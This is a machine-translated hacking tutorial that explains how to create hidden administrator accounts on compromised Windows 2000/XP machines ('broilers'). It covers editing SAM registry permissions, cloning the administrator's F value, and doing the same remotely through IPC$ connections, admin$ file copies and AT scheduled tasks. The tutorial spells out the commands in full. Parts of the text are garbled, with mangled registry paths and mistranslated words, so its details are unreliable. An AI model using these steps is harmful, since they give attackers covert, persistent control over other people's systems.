First, how
Estably the hidden super user graphics interface is built on the graphical interface. The author I mentioned above is very good, but it is more complicated, and the PSU.exe (procedure to run as a system user), if you want to upload PSU.exe on the broiler. I said this method will not have to use the PSU.exe. Because Windows 2000 has two registry editors: regedit.exe and regedt32.exe. Regedit.exe and RegedT32.exe in XP are actually a program that modifies the "permission" in right-click "Permissions" when the key value is modified. I think everyone is familiar with regedit.exe, but it is not possible to set permissions to the registry, and the greatest advantage of RegedT32.exe is to set permissions to the registry. NT / 2000 / XP account information is under the hkey_local_machinesamsamsamsam of the registry, but in addition to the system user system users, other users have no right to view the information inside, so I first use regedt32.exe to set the SAM key to "" Full Control Permissions. This allows the information in the SAM key to read and write. Specific steps are as follows: 1. Suppose we are on the broiler of the open terminal with superuser administrator, first create an account in the command line or account manager: Hacker $, here I set up this in the command line Account NET User Hacker $ 1234 / Add 2, enter: regedt32.exe and enter the regedt32.exe in the start / run. 3, click "Permissions" will then pop up the window point Add to add the account when I log in to the security bar. Here I log in as an administrator, so I will add the Administrator to, and set the permissions to "fully control". Here you need to explain: It is best to add the group where your logged in account or account is, do you want to modify the original account or group, otherwise a series of unnecessary issues will be brought. Waiting for hidden super users to build, come here to delete the account you add. 4, click "Start" → "Run" and enter "regedit.exe" Enter, start the registry editor regedit.exe. Open button: HKEY_LOCAL_MAICHINESAMSAMDOMAINSACCOUSERNAMSAMDOMAINSACCOUSERNAMESHACKER $ "5. Export items Hacker $, 00000409, 000001F4 is Hacker.Reg, 409.REG, 1F4.REG, use notepad to play these exported files, edit the superuser The value of the key "f" under 000001F4 is reproduced, and overrides the key "f" values of the key "f" corresponding to the HACKER $, and then 00000409.REG is combined with the Hacker.reg. 6, execute Net User Hacker in the command line $ / DEL Deletes the user Hacker $ / DEL 7, press F5 to refresh in the regedit.exe window, then play the file - Import the registry file to change the modified Hacker.REG to import the registry 8, At this point, hidden superuser HACKER $ is already built, then turn off regedit.exe. Turn your HKEY_LOCAL_MACHINESAMSAM key in the regedt32.exe window (just remove the added account administrator).
9. Note: After hidden superuser is built, the account manager does not see the Hacker $ user, you can't see the "net user" command in the command line, but after the superuser is built, you can't change your password. If you use the NET user command to change the password of Hacker $, then this hidden superuser will be seen in the Account Manager, and cannot be deleted. How to remotely create hidden superusers in the command line will use the AT command because the planned task generated by AT is to run as system, so the psu.exe program is not used. In order to be able to use the AT command, the broiler must open the SCHEDULE service. If it is not turned on, the tool NetSvc.exe or sc.exe in the stream of light can be used remotely. Of course, the method can also be able to start the Schedule service. For command line, you can use a variety of connection methods, such as connecting the MSSQL's 1433 port with SQLEXEC, you can also use Telnet to get a cmdshell, and there is permission to run the AT command. 1. First find a broiler, as for how to come to this is not what I said here. Here first, it is assumed to find a super user for the applistrator, the password is 12345678 broiler, and now we start to remotely establish a hidden super user on the command line. (The host in the example is a host in my local area network. I change its IP address to 13.50.97.238, do not sit on the Internet to avoid harassing the normal IP address.) 2, first establish a connection with broilers Command is: NET Use 13.50.97.238iPC $ "12345678" / user: "Administrator 3, build a user on broiler with the AT command (if the AT service is not started, you can use the little Netsvc.exe or Sc.exe to remotely Startup): AT 13.50.97.238 12:51 C: WinntSystem32Net.exe User Hacker $ 1234 / Add Build this add-in-user name, because the order is added, the command line will not display this user but the account manager was able to see the user 4, with the same command to export the key at the lower HKEY_LOCAL_MACHINEsamsamDomainsaccountusers:. at 13.50.97.238 12:55 c: winntregedit.exe / e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers / e is the regedit.exe Parameters, must end with the end of _local_machinesamdomdomainsaccountusers. If necessary, use quotation marks "C: WinNTRegedit.exe / e Hacker.reg HKEY_LOCAL_MACHINESAMSAMDOMAINSACCOUNTUSERS". 5, download the Hacker.reg on broiler to this machine Uploaded by Notepad to edit commands: Copy 13.50.97.238admin $ system32hacker.reg C: Hacker.Reg Modified method graphics boundary, here is not introduced.
6, then copy the editorial Hacker.reg to the broiler on Copy C: Hacker.REG 13.50.97.238Admin $ SYSTEM32HACKER1.REG 7, view broilers: net time 13.50.97.238 then use the AT command to delete the user Hacker $: 13.50.97.238 13:40 NET User Hacker $ / DEL 8, Verify that Hacker $ is deleted: Disconnect with broiler with Net Use 13.50.97.238 / DEL. NET Use 13.50.97.238IPC $ "1234" / user: "Hacker $" is connected to the broiler with the account, and cannot be connected to the description. 9, then establish a connection with broiler: NET use 13.50.97.238iPC $ "12345678" / user: "administrator" to get the broiler time, use the AT command will copy the broiler's Hacker1.REG imported broiler registry: AT 13.50.97.238 13 : 41 C: The parameter / s of WinntregEdit.exe / s Hacker1.Reg Regedit.exe refers to quiet mode. 10. Verify that the Hacker $ is established, the method is the same as above if the Hacker $ is deleted. 11, then verify that the user HACKER $ has read, write, deleted permissions, if you don't worry, you can also verify that you can build other accounts. 12, through 11 can determine the user HACKER $ with superuser privilege, because I originally used the AT command to build it is a normal user, but now there is remote read, write, deleted permissions. Third, if the broiler does not open 3389 terminal service, and I don't want to use the command line, what should I do? In this case, you can also use the interface to establish a hidden super user with broilers. Because regedit.exe, RegedT32.exe has the function of connecting to the network registry, you can use regedt32.exe to set permissions for the registry key of the remote host, with regedit.exe to edit the remote registry. The account manager also has a function of another computer, you can use the Account Manager to create and delete an account for the remote host. Specific step gathering is similar to the above, I don't say much, only its speed is unbearable. But there are two premises here: 1, first use the NET USE broiler ipipc $ "password" / user: "Super User Name" to establish a connection with the remote host to use regedit.exe regedt32.exe and account manager and remote host connection. 2, the remote host must turn on the remote registry service (if not open, you can also open it remotely because you have a superuser password). 4. Establish hidden superusers with disabled accounts: We can use users from broiler to establish hidden hypercar. The method is as follows: 1. If you want to see what users are carefully prohibited, in general, some administrators usually disable guests for security, of course, if they are disabled. Under the graphical interface, it is very easy, as long as you can see a red cross on the disabled account; on the command line, I haven't thought of good ways, I can only use commands in the command line. : "NET User User Name" One one is to see if the user is disabled. 2. Here, we assume that the user Hacker is disabled by the administrator.
